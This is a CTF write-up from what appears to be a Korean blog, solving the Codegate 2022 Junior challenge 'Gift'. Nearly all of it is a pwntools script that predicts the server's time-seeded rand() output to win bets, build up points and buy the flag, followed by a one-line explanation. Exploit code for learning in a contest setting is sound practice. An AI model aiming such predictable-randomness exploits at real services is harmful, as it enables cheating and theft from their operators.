[CTF write up] Codegate CTF 2022 Junior - Gift : Rand() Crack

2022. 2. 27. 17:38CTF write up

from pwn import *
import ctypes

point = 20

def money(point):
    p.sendlineafter(b'>', b'3')
    p.sendlineafter(b'>', b'5')
    lib = ctypes.CDLL('/lib/x86_64-linux-gnu/libc.so.6')
    lib.srand(lib.time(0))
    a = lib.rand() % 50
    b = lib.rand() % 50
    if a > b:
        p.sendlineafter(b'>', f'{point} 2'.encode())
    else:
        p.sendlineafter(b'>', f'{point} 1'.encode())
    print(a, b)

#p = process(['cooldown'], env={'LD_PRELOAD':'./libc.so.6'})
p = process('Gift')
p = remote('3.39.28.41',8888)

p.sendlineafter(b'?',b'name')

p.sendlineafter(b'>',b'3')
p.sendlineafter(b'>',b'3')
p.sendlineafter(b'>',b'abcd')

for i in range(0,5):
    money(point)
    point = point + point*2

for i in range(0,20):
    p.sendlineafter(b'>',b'3')
    p.sendlineafter(b'>',b'4')
    p.sendlineafter(b'>',b'2')
    point = point - 100

print(point)

for i in range(0,10):
    money(point)
    point = point + point*2

p.interactive()

 

서버가 난수표를 설정할때 동시에 설정하면 rand() 함수에서 동일한 값이 나온다. 해당 트릭으로 포인트를 늘려서 flag를 구매하면 된다.

 

 

'CTF write up' 카테고리의 다른 글

[CTF write up] Codegate CTF 2022 Junior - Dino_diary : Simple Out Of Bound  (0) 2022.02.27
[CTF write up] Codegate CTF 2022 Junior - cat_tail : Hidden Format String Bug  (0) 2022.02.27
[CTF write up] HayyimCTF 2022 - MemoryManager : Child VM challenge  (0) 2022.02.18
[CTF write up] HayyimCTF 2022 - Cooldown / WarmUp : Tiny Binary Exploitation  (0) 2022.02.14
[CTF write up] Zer0pts CTF 2021 - oneshot : 안전하지 않은 반환 값으로 인한 임의의 주소 쓰기(AAW) 취약점  (0) 2022.02.10

관련글

댓글 0

티스토리툴바